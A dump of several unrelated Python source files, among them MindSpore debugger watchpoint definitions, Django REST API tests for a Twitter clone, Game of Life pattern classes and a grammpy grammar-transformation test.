name=ParamNameEnum.MIN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MEAN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
)
],
supported_target_type=TargetTypeEnum.TENSOR,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.TENSOR_ALL_ZERO,
abbr="TZ",
        # Sending this condition to MindSpore uses WatchCondition.Condition.tensor_all_zero
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ZERO_PERCENTAGE_GE,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_percentage_param_range,
default_value=100
)
],
supported_target_type=TargetTypeEnum.TENSOR,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.WEIGHT_NOT_CHANGED,
abbr="WNC",
        # Sending this condition to MindSpore uses WatchCondition.Condition.tensor_not_changed
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.RTOL,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range,
default_value=1e-5
),
ConditionParameter(
name=ParamNameEnum.ATOL,
value_type=ValueTypeEnum.FLOAT64,
support_disable=False,
default_value=1e-8,
visible_on_ui=False
),
ConditionParameter(
name=ParamNameEnum.EQUAL_NAN,
value_type=ValueTypeEnum.BOOL,
support_disable=False,
default_value=False,
visible_on_ui=False
)
],
supported_target_type=TargetTypeEnum.WEIGHT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.WEIGHT_CHANGE_TOO_LARGE,
abbr="WCL",
        # Sending this condition to MindSpore uses WatchCondition.Condition.tensor_change_too_large
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ABS_MEAN_UPDATE_RATIO_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range,
default_value=1e-1
),
ConditionParameter(
name=ParamNameEnum.EPSILON,
value_type=ValueTypeEnum.FLOAT64,
support_disable=False,
default_value=1e-9,
visible_on_ui=False
)
],
supported_target_type=TargetTypeEnum.WEIGHT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.WEIGHT_CHANGE_TOO_SMALL,
abbr="WCS",
        # Sending this condition to MindSpore uses WatchCondition.Condition.tensor_change_too_small
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ABS_MEAN_UPDATE_RATIO_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range,
default_value=1e-4
),
ConditionParameter(
name=ParamNameEnum.EPSILON,
value_type=ValueTypeEnum.FLOAT64,
support_disable=False,
default_value=1e-9,
visible_on_ui=False
)
],
supported_target_type=TargetTypeEnum.WEIGHT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.ACTIVATION_RANGE,
abbr="AR",
        # Sending this condition to MindSpore uses WatchCondition.Condition.activation_range
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.RANGE_START_INCLUSIVE,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range,
param_type=ParamTypeEnum.SUPPORT_PARAM
),
ConditionParameter(
name=ParamNameEnum.RANGE_END_INCLUSIVE,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range,
param_type=ParamTypeEnum.SUPPORT_PARAM
),
ConditionParameter(
name=ParamNameEnum.RANGE_PERCENTAGE_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_percentage_param_range,
required_params=[ParamNameEnum.RANGE_START_INCLUSIVE.value, ParamNameEnum.RANGE_END_INCLUSIVE.value]
),
ConditionParameter(
name=ParamNameEnum.RANGE_PERCENTAGE_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_percentage_param_range,
required_params=[ParamNameEnum.RANGE_START_INCLUSIVE.value, ParamNameEnum.RANGE_END_INCLUSIVE.value]
),
ConditionParameter(
name=ParamNameEnum.MAX_MIN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_positive_param_range
),
ConditionParameter(
name=ParamNameEnum.MAX_MIN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range
)
],
supported_target_type=TargetTypeEnum.ACTIVATION,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.TENSOR_RANGE,
abbr="TR",
        # Sending this condition to MindSpore uses WatchCondition.Condition.tensor_range
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.RANGE_START_INCLUSIVE,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range,
param_type=ParamTypeEnum.SUPPORT_PARAM
),
ConditionParameter(
name=ParamNameEnum.RANGE_END_INCLUSIVE,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range,
param_type=ParamTypeEnum.SUPPORT_PARAM
),
ConditionParameter(
name=ParamNameEnum.RANGE_PERCENTAGE_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_percentage_param_range,
required_params=[ParamNameEnum.RANGE_START_INCLUSIVE.value, ParamNameEnum.RANGE_END_INCLUSIVE.value]
),
ConditionParameter(
name=ParamNameEnum.RANGE_PERCENTAGE_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_percentage_param_range,
required_params=[ParamNameEnum.RANGE_START_INCLUSIVE.value, ParamNameEnum.RANGE_END_INCLUSIVE.value]
),
ConditionParameter(
name=ParamNameEnum.MAX_MIN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_positive_param_range
),
ConditionParameter(
name=ParamNameEnum.MAX_MIN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range
)
],
supported_target_type=TargetTypeEnum.TENSOR,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
)
]
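A registry like the condition list above is typically consumed by filtering on its declared metadata before watchpoints are sent to a backend. A standalone sketch of platform-based filtering (hypothetical names and structure, not the MindInsight API):

```python
from collections import namedtuple

# Minimal stand-in for the Condition entries above (hypothetical structure).
Condition = namedtuple("Condition", "condition_id abbr supported_platforms")

REGISTRY = [
    Condition("operator_overflow", "OO", ("ASCEND",)),
    Condition("tensor_too_large", "TL", ("ASCEND", "GPU")),
    Condition("tensor_all_zero", "TZ", ("ASCEND", "GPU")),
]

def conditions_for(platform):
    """Return only the conditions supported on the given platform."""
    return [c for c in REGISTRY if platform in c.supported_platforms]

# GPU omits the Ascend-only operator-overflow watchpoint:
print([c.abbr for c in conditions_for("GPU")])  # ['TL', 'TZ']
```

Keeping `supported_platforms` as data, as the list above does, lets the UI hide unsupported checks without any per-condition branching.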
e5e730a138c62acd55624051a4f38367902078f0 | 160 | py | Python | loldib/getratings/models/NA/na_malzahar/__init__.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | ["Apache-2.0"]
from .na_malzahar_top import *
from .na_malzahar_jng import *
from .na_malzahar_mid import *
from .na_malzahar_bot import *
from .na_malzahar_sup import *
e5f5fe13767b86ced12e163cc932e1343bef3505 | 2,060 | py | Python | tests/test_path.py | OctaveLauby/olutils | 9d0741fe2a3ce527be60be2bf1a6904c3340e488 | ["Apache-2.0"]
import os
import pytest
from olutils.storing import write_txt
import olutils.path as lib
def test_get_next_path_index(tmpdir):
path_frmt = os.path.join(tmpdir.strpath, "file_{}.txt")
assert lib.get_next_path_index(path_frmt) == 1
assert lib.get_next_path_index(path_frmt, start=10) == 10
write_txt("", path_frmt.format(10))
assert lib.get_next_path_index(path_frmt) == 1
assert lib.get_next_path_index(path_frmt, start=10) == 11
with pytest.raises(ValueError):
lib.get_next_path("file_{}_{}.txt")
with pytest.raises(ValueError):
lib.get_next_path("file.txt")
with pytest.raises(ValueError):
lib.get_next_path("file_{index}.txt")
def test_get_next_path(tmpdir):
path_frmt = os.path.join(tmpdir.strpath, "file_{}.txt")
path_frmt_2 = os.path.join(tmpdir.strpath, "file_{:03d}.txt")
assert lib.get_next_path(path_frmt) == os.path.join(tmpdir.strpath, "file_1.txt")
assert lib.get_next_path(path_frmt, start=10) == os.path.join(tmpdir.strpath, "file_10.txt")
assert lib.get_next_path(path_frmt_2) == os.path.join(tmpdir.strpath, "file_001.txt")
assert lib.get_next_path(path_frmt_2, start=10) == os.path.join(tmpdir.strpath, "file_010.txt")
write_txt("", path_frmt.format(10))
assert lib.get_next_path(path_frmt) == os.path.join(tmpdir.strpath, "file_1.txt")
assert lib.get_next_path(path_frmt, start=10) == os.path.join(tmpdir.strpath, "file_11.txt")
assert lib.get_next_path(path_frmt_2) == os.path.join(tmpdir.strpath, "file_001.txt")
assert lib.get_next_path(path_frmt_2, start=10) == os.path.join(tmpdir.strpath, "file_010.txt")
write_txt("", path_frmt.format(100))
assert lib.get_next_path(path_frmt) == os.path.join(tmpdir.strpath, "file_1.txt")
assert lib.get_next_path(path_frmt, start=10) == os.path.join(tmpdir.strpath, "file_11.txt")
assert lib.get_next_path(path_frmt_2) == os.path.join(tmpdir.strpath, "file_001.txt")
assert lib.get_next_path(path_frmt_2, start=100) == os.path.join(tmpdir.strpath, "file_101.txt")
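The library's actual implementation is not shown in this chunk; a minimal sketch consistent with the assertions above (my reconstruction, not olutils' code) could be:

```python
import os
import string

def get_next_path_index(path_frmt, start=1):
    """Return the first index >= start whose formatted path does not exist yet."""
    # Accept exactly one anonymous positional field: "{}" or "{:03d}", but
    # reject "file.txt", "file_{}_{}.txt" and "file_{index}.txt".
    fields = [f for _, f, _, _ in string.Formatter().parse(path_frmt) if f is not None]
    if len(fields) != 1 or fields[0] != "":
        raise ValueError("path_frmt must contain exactly one positional '{}' field")
    index = start
    while os.path.exists(path_frmt.format(index)):
        index += 1
    return index

def get_next_path(path_frmt, start=1):
    """Return the next available path built from path_frmt."""
    return path_frmt.format(get_next_path_index(path_frmt, start))
```

Note that `string.Formatter.parse` reports `"{:03d}"` as the same auto-numbered field as `"{}"`, which is why the tests accept a format spec while rejecting named fields.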
e5ff55af64bca465d8c87ffcce6cb76b6c6c33dc | 2,964 | py | Python | nesting/default_data.py | hrvojevu/xblock-nesting | fd56f983f5378bd6f3e72c3cdb0a7430965a4433 | ["MIT"]
DEFAULT_STYLES = {
'margin': '0',
'padding': '10px',
'border-top': '0',
'border-right': '0',
'border-bottom': '0',
'border-left': '0'
}
DEFAULT_TEMPLATES = {
'template-2': {
'children': [
{
'category': 'html',
'children': []
},
{
'category': 'html',
'children': []
},
{
'category': 'html',
'children': []
},
{
'category': 'html',
'children': []
},
{
'id': 'nesting-1',
'category': 'nesting',
'width': 50,
'children': [
{
'parent_id': 'nesting-1',
'category': 'html',
'children': []
}
]
},
{
'id': 'nesting-2',
'category': 'nesting',
'width': 50,
'children': [
{
'parent_id': 'nesting-2',
'category': 'html',
'children': []
}
]
}
]
},
'template-1': {
'children': [
{
'id': 'nesting-1',
'category': 'nesting',
'width': 70,
'children': [
{
'parent_id': 'nesting-1',
'category': 'html',
'children': []
},
{
'parent_id': 'nesting-1',
'category': 'video',
'type': 'video',
'children': []
},
{
'parent_id': 'nesting-1',
'category': 'html',
'children': []
},
{
'id': 'nesting-3',
'parent_id': 'nesting-1',
'category': 'nesting',
'width': 50,
'children': [
{
'parent_id': 'nesting-3',
'category': 'html',
'children': []
}
]
},
{
'id': 'nesting-4',
'parent_id': 'nesting-1',
'category': 'nesting',
'width': 50,
'children': [
{
'parent_id': 'nesting-4',
'category': 'html',
'children': []
}
]
}
]
},
{
'id': 'nesting-2',
'category': 'nesting',
'width': 30,
'children': [
{
'parent_id': 'nesting-2',
'category': 'html',
'children': []
},
{
'parent_id': 'nesting-2',
'category': 'html',
'children': []
},
{
'parent_id': 'nesting-2',
'category': 'html',
'children': []
},
{
'parent_id': 'nesting-2',
'category': 'html',
'children': []
},
{
'parent_id': 'nesting-2',
'category': 'html',
'children': []
}
]
}
]
}
}
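A plausible invariant of these templates is that sibling `nesting` widths are percentages summing to 100 (70+30 and 50+50 above). A hypothetical standalone checker for that invariant, not part of the xblock itself:

```python
def nesting_widths_ok(children):
    """Recursively check that sibling 'nesting' widths sum to 100 percent."""
    widths = [c["width"] for c in children if c.get("category") == "nesting"]
    if widths and sum(widths) != 100:
        return False
    return all(nesting_widths_ok(c.get("children", [])) for c in children)

# Mini structure mirroring the shape of 'template-1':
sample = [
    {"category": "html", "children": []},
    {"category": "nesting", "width": 70, "children": [
        {"category": "nesting", "width": 50, "children": []},
        {"category": "nesting", "width": 50, "children": []},
    ]},
    {"category": "nesting", "width": 30, "children": []},
]
print(nesting_widths_ok(sample))  # True
```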
f914f1ba2b0d00e36b8f6538c76337de800a697e | 12,453 | py | Python | tweets/tests.py | B339r1p/twitter-lite-test-assignment | 8bcd12c1d99959ab0bc748bca6d9ffbbcc1b3598 | ["MIT"]
from django.contrib.auth.models import User
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from tweets.models import Tweet, Like, Retweet, Comment
class TweetTests(APITestCase):
def test_create_tweet(self):
"""
        Ensure we can update the tweet object via PUT.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text=" Elon Musk SpaceX_project initiated...... ", user=user)
url = reverse('tweet-detail', kwargs={'pk':tweet.id})
data = {'text': 'Lami', 'user': user.id}
response = self.client.put(url, data)
response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_tweet(self):
"""
        Ensure we can list tweet objects.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="this is a simple tweet", user=user)
url = reverse('tweet-list')
data = {'tweet': tweet.id, "user": user.id}
response = self.client.get(url, data, format='json')
response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_one_get_tweet(self):
"""
        Ensure we can retrieve a created tweet from the list.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="this is a simple tweet", user=user)
url = reverse('tweet-list')
data = {'tweet': tweet.id, "user": user.id}
response = self.client.get(url, data, format='json')
response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(Tweet.objects.count(), 1)
self.assertEqual(response_data[0]['text'], tweet.text)
def test_post_tweet(self):
"""
Ensure we can create a new tweet object.
"""
user = User.objects.create_user(username="lami", password="password123")
url = reverse('tweet-list')
data = {'text': 'DabApps', "user": user.id}
response = self.client.post(url, data) # format='json'
response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(Tweet.objects.count(), 1)
self.assertEqual(Tweet.objects.get().text, data['text'])
self.assertEqual(response_data['text'], data['text'])
def test_delete_tweet(self):
"""
Ensure we can delete the tweet object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="No Bill Me", user=user)
url = reverse('tweet-detail',kwargs={"pk":tweet.id})
data = {'text': 'DabApps', "user": user.id}
response = self.client.delete(url,data, format = 'json')
# response_data = response.json()
# print(response)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_patch_tweet(self):
"""
Ensure we can patch the tweet object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text=" SpaceX_project loading...... ", user=user)
url = reverse('tweet-detail', kwargs={'pk':tweet.id})
data = {'text': 'Lami', 'user': user.id}
response = self.client.patch(url, data)
response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
################################################################################################################
class RetweetTests(APITestCase):
def test_post_retweet(self):
"""
Ensure we can create a new retweet object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="on God", user=user)
url = reverse('retweet-list')
data = {'tweet': tweet.id, "user": user.id}
response = self.client.post(url, data, format='json')
response_data = response.json()
print(response_data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_get_retweet(self):
        user = User.objects.create_user(username='j_one', password='password123')
        tweet = Tweet.objects.create(text='God is at work', user=user)
        url = reverse('retweet-list')
        data = {'tweet': tweet.id, 'user': user.id}
        response = self.client.get(url, data, format='json')
        response_data = response.json()
        print(response_data)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_one_get_retweet(self):
"""
        Ensure we can list retweet objects.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="this is a simple tweet", user=user)
url = reverse('retweet-list')
data = {'tweet': tweet.id, "user": user.id}
response = self.client.get(url, data, format='json')
response_data = response.json()
        # print(response_data)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_delete_retweet(self):
"""
Ensure we can delete the retweet object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="Awesome God", user=user)
url = reverse('tweet-detail',kwargs={"pk":tweet.id})
# url = reverse('retweet-list')
data = {'tweet': tweet.id, "user": user.id}
response = self.client.delete(url,data, format = 'json')
# response_data = response.json()
# print(response)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
########################################################################################################################
class LikeTests(APITestCase):
def test_post_like(self):
"""
Ensure we can like tweet object.
"""
user = User.objects.create_user(username="oladapo", password="password123")
tweet = Tweet.objects.create(text="We are getting there", user=user)
url = reverse('like-list')
data = {'tweet': tweet.id, "user": user.id}
response = self.client.post(url, data, format='json')
response_data = response.json()
print(response_data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_get_like(self):
"""
Ensure we can get tweet object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="Omooo eh don dey choke oooooo",user=user)
url = reverse("like-list")
data ={'tweet':tweet.id, "user":user.id}
response = self.client.get(url,data,format='json')
# print("done")
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_one_get_like(self):
"""
        Ensure we can list like objects.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="this is a simple tweet", user=user)
url = reverse('like-list')
data = {'tweet': tweet.id, "user": user.id}
response = self.client.get(url, data, format='json')
response_data = response.json()
        # print(response_data)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_delete_like(self):
user = User.objects.create_user(username='lami', password='password')
tweet = Tweet.objects.create(text='JesuChristian',user=user)
url = reverse('tweet-detail',kwargs={"pk":tweet.id})
data= {'tweet':tweet.id,'user':user.id}
response = self.client.delete(url,data,format='json')
print('complete')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
# #####################################################################################################################################
class CommentTest(APITestCase):
def test_create_comment(self):
user = User.objects.create_user(username='lami', password='password')
tweet = Tweet.objects.create(text='JesusChristian',user=user)
comment = Comment.objects.create(text='this is a new comment', user = user, tweet=tweet)
url = reverse('tweet-list')
data= {'tweet':tweet.id,'user':user.id, 'text':'corrected by Mr. Johnson.py'}
response = self.client.post(url,data)
        response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_patch_comment(self):
user = User.objects.create_user(username="lami",password="password123")
tweet = Tweet.objects.create(text="Monday", user=user)
comment = Comment.objects.create(text='all on God ni oooooo', user = user, tweet=tweet)
url = reverse('tweet-detail',kwargs={"pk":tweet.id})
data = {'tweet':tweet.id,"user":user.id}
response = self.client.patch(url,data,format='json')
response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_put_comment(self):
"""
        Ensure we can update the comment object via PUT.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text=" Elon Musk SpaceX_project put it in X2...... ", user=user)
comment = Comment.objects.create(text='all on God ni oooooo', user = user, tweet=tweet)
url = reverse('tweet-detail', kwargs={'pk':tweet.id})
data = {'text': 'Lami', 'user': user.id}
response = self.client.put(url, data)
response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_comment(self):
"""
Ensure we can get comment object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="Omooo eh don dey choke oooooo",user=user)
comment = Comment.objects.create(text='thanks to Almighty God, the Alpha and Omega', user = user, tweet=tweet)
url = reverse("like-list")
data ={'tweet':tweet.id, "user":user.id}
response = self.client.get(url,data,format='json')
response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_one_get_comment(self):
"""
        Ensure we can retrieve a single comment object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="this is a simple tweet", user=user)
comment = Comment.objects.create(text = 'omooo this Django nah die iswear', tweet = tweet, user = user)
# url = reverse('comment-list')
url = reverse('comment-detail', kwargs={'pk':comment.id})
data = {'tweet': tweet.id, "user": user.id, 'text': comment.id}
response = self.client.get(url, data, format='json')
response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(Comment.objects.count(), 1)
# self.assertEqual(response_data['text'], tweet.text)
def test_delete_comment(self):
user = User.objects.create_user(username='lami', password='password')
tweet = Tweet.objects.create(text='JesuChristian',user=user)
comment = Comment.objects.create(text='Segun we are getting there', user = user, tweet=tweet)
url = reverse('tweet-detail',kwargs={"pk":tweet.id})
data= {'tweet':tweet.id,'user':user.id}
response = self.client.delete(url,data,format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
dad5dd734893c7db9e2fd7470d7b3bca5202f66c | 2,076 | py | Python | GoLEntities.py | plencka/Game-of-Life-Python-Entity-Based | 49529cd0d1090631f5a110b42a34e009b57edcb3 | ["MIT"]
# Component of GoLPyEntity.
# Predefined entities that can be placed on the board using GoLSpawnSet.py.
class eBush:
def __init__(self,offsetX,offsetY):
self.l = 6
self.pos = []
self.pos.append([0+offsetX,0+offsetY])
self.pos.append([0+offsetX,1+offsetY])
self.pos.append([0+offsetX,2+offsetY])
self.pos.append([1+offsetX,0+offsetY])
self.pos.append([1+offsetX,1+offsetY])
self.pos.append([1+offsetX,2+offsetY])
class eBlink:
def __init__(self,offsetX,offsetY):
self.l = 3
self.pos = []
self.pos.append([0+offsetX,0+offsetY])
self.pos.append([0+offsetX,1+offsetY])
self.pos.append([0+offsetX,2+offsetY])
class eFlyer:
def __init__(self,offsetX,offsetY):
self.l = 5
self.pos = []
self.pos.append([0+offsetX,0+offsetY])
self.pos.append([0+offsetX,1+offsetY])
self.pos.append([0+offsetX,2+offsetY])
self.pos.append([1+offsetX,0+offsetY])
self.pos.append([2+offsetX,1+offsetY])
class eGrower:
def __init__(self,offsetX,offsetY):
self.l = 6
self.pos = []
self.pos.append([0+offsetX,0+offsetY])
self.pos.append([0+offsetX,1+offsetY])
self.pos.append([0+offsetX,2+offsetY])
self.pos.append([2+offsetX,0+offsetY])
self.pos.append([1+offsetX,1+offsetY])
self.pos.append([2+offsetX,2+offsetY])
class eFlower:
def __init__(self,offsetX,offsetY):
self.l = 8
self.pos = []
self.pos.append([0+offsetX,0+offsetY])
self.pos.append([0+offsetX,2+offsetY])
self.pos.append([0+offsetX,4+offsetY])
self.pos.append([1+offsetX,1+offsetY])
self.pos.append([1+offsetX,3+offsetY])
self.pos.append([2+offsetX,0+offsetY])
self.pos.append([2+offsetX,2+offsetY])
self.pos.append([2+offsetX,4+offsetY])
class ePyramid:
def __init__(self,offsetX,offsetY):
self.l = 8
self.pos = []
self.pos.append([0+offsetX,2+offsetY])
self.pos.append([1+offsetX,1+offsetY])
self.pos.append([1+offsetX,3+offsetY])
self.pos.append([2+offsetX,0+offsetY])
self.pos.append([2+offsetX,1+offsetY])
self.pos.append([2+offsetX,2+offsetY])
self.pos.append([2+offsetX,3+offsetY])
        self.pos.append([2+offsetX,4+offsetY])
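Each entity above is just a list of live-cell coordinates translated by an offset, so the append chains can equivalently be written as list literals or comprehensions. A standalone restatement of `eBlink` (the three vertical cells of the classic blinker) plus a spawn check, as a sketch rather than part of the original module:

```python
class eBlink:
    """Three vertically adjacent cells: the classic 'blinker' oscillator."""
    def __init__(self, offsetX, offsetY):
        self.l = 3
        self.pos = [[offsetX, offsetY + dy] for dy in range(3)]

blink = eBlink(4, 7)
print(blink.pos)  # [[4, 7], [4, 8], [4, 9]]
```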
9734404fe1ddd04beae4442968f942f68967c4cd | 19,226 | py | Python | tests/transformations_test/RemovingUnitRules/SimpleTest.py | PatrikValkovic/grammpy | 8308a1fd349bf9ea0d267360cc9a4ab20d1629e8 | ["MIT"]
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 22.08.2017 20:51
:Licence MIT
Part of grammpy
"""
from inspect import isclass
from unittest import main, TestCase
from grammpy import *
from grammpy.transforms import ContextFree
class S(Nonterminal): pass
class A(Nonterminal): pass
class B(Nonterminal): pass
class C(Nonterminal): pass
class D(Nonterminal): pass
class Rules(Rule):
rules=[
([S], [A]),
([S], [B]),
([A], [C]),
([A], [0, A]),
([A], [1, S]),
([B], [D]),
([B], [2, B]),
([B], [3, S]),
([C], [1, C]),
([C], [0]),
([D], [3, D]),
([D], [2])]
"""
-------------------------------
| S | A | B | C | D |
--------------------------------
S| [] | [1] | [2] |[1,3]|[2,6]|
--------------------------------
A| | [] | | [3] | |
--------------------------------
B| | | [] | | [6] |
--------------------------------
C| | | | [] | |
--------------------------------
D| | | | | [] |
--------------------------------
S->A S->B A->C A->0A A->1S B->D B->2B B->3S C->1C C->0 D->3D D->2
---- ---- ---- ----
S->A->0A
S->A->1S
S->A->C->1C
S->A->C->0
S->B->2B
S->B->3S
S->B->D->3D
S->B->D->2
A->C->1C
A->C->0
B->D->3D
B->D->2
"""
class SimpleTest(TestCase):
def test_simpleTest(self):
g = Grammar(terminals=[0, 1, 2, 3],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
com = ContextFree.remove_unit_rules(g)
# Removed
class RuleStoA(Rule): rule=([S], [A])
self.assertNotIn(RuleStoA, com.rules)
class RuleStoB(Rule): rule=([S], [B])
self.assertNotIn(RuleStoB, com.rules)
class RuleAtoC(Rule): rule=([A], [C])
self.assertNotIn(RuleAtoC, com.rules)
class RuleBtoD(Rule): rule=([B], [D])
self.assertNotIn(RuleBtoD, com.rules)
# Old rules
class RuleNewAto0A(Rule): rule = ([A], [0, A])
self.assertIn(RuleNewAto0A, com.rules)
class RuleNewAto1S(Rule): rule = ([A], [1, S])
self.assertIn(RuleNewAto1S, com.rules)
class RuleNewBto2B(Rule): rule = ([B], [2, B])
self.assertIn(RuleNewBto2B, com.rules)
class RuleNewBto3S(Rule): rule = ([B], [3, S])
self.assertIn(RuleNewBto3S, com.rules)
class RuleNewCto1C(Rule): rule = ([C], [1, C])
self.assertIn(RuleNewCto1C, com.rules)
class RuleNewCto0(Rule): rule = ([C], [0])
self.assertIn(RuleNewCto0, com.rules)
class RuleNewDto3D(Rule): rule = ([D], [3, D])
self.assertIn(RuleNewDto3D, com.rules)
class RuleNewDto2(Rule): rule = ([D], [2])
self.assertIn(RuleNewDto2, com.rules)
# New rules
class RuleNewSto0A(Rule): rule = ([S], [0, A])
self.assertIn(RuleNewSto0A, com.rules)
fromSto0A = list(filter(lambda x: hash(x) == hash(RuleNewSto0A), com.rules))[0]
self.assertTrue(isclass(fromSto0A))
self.assertTrue(issubclass(fromSto0A, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto0A.by_rules), 1)
self.assertEqual(fromSto0A.by_rules[0].rule, ([S], [A]))
self.assertEqual(fromSto0A.end_rule.rule, ([A], [0, A]))
class RuleNewSto1S(Rule): rule = ([S], [1, S])
self.assertIn(RuleNewSto1S, com.rules)
fromSto1S = list(filter(lambda x: hash(x) == hash(RuleNewSto1S), com.rules))[0]
self.assertTrue(isclass(fromSto1S))
self.assertTrue(issubclass(fromSto1S, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto1S.by_rules), 1)
self.assertEqual(fromSto1S.by_rules[0].rule, ([S], [A]))
self.assertEqual(fromSto1S.end_rule.rule, ([A], [1, S]))
class RuleNewSto1C(Rule): rule = ([S], [1, C])
self.assertIn(RuleNewSto1C, com.rules)
fromSto1C = list(filter(lambda x: hash(x) == hash(RuleNewSto1C), com.rules))[0]
self.assertTrue(isclass(fromSto1C))
self.assertTrue(issubclass(fromSto1C, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto1C.by_rules), 2)
self.assertEqual(fromSto1C.by_rules[0].rule, ([S], [A]))
self.assertEqual(fromSto1C.by_rules[1].rule, ([A], [C]))
self.assertEqual(fromSto1C.end_rule.rule, ([C], [1, C]))
class RuleNewSto0(Rule): rule = ([S], [0])
self.assertIn(RuleNewSto0, com.rules)
fromSto0 = list(filter(lambda x: hash(x) == hash(RuleNewSto0), com.rules))[0]
self.assertTrue(isclass(fromSto0))
self.assertTrue(issubclass(fromSto0, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto0.by_rules), 2)
self.assertEqual(fromSto0.by_rules[0].rule, ([S], [A]))
self.assertEqual(fromSto0.by_rules[1].rule, ([A], [C]))
self.assertEqual(fromSto0.end_rule.rule, ([C], [0]))
class RuleNewSto2B(Rule): rule = ([S], [2, B])
